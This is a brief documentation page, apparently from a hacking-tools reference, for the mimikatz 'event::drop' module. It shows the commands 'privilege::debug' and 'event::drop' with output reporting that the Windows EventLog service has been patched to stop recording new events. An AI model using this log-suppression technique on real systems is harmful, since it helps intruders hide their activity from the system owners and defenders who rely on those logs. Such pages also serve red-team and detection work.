> For the complete documentation index, see [llms.txt](https://tools.thehacker.recipes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://tools.thehacker.recipes/mimikatz/modules/event/drop.md).

# drop

`event::drop` can be used to patch event services to avoid new events ( :warning: experimental)

```
mimikatz # privilege::debug
Privilege '20' OK
```

```
mimikatz # event::drop
"EventLog" service patched
```
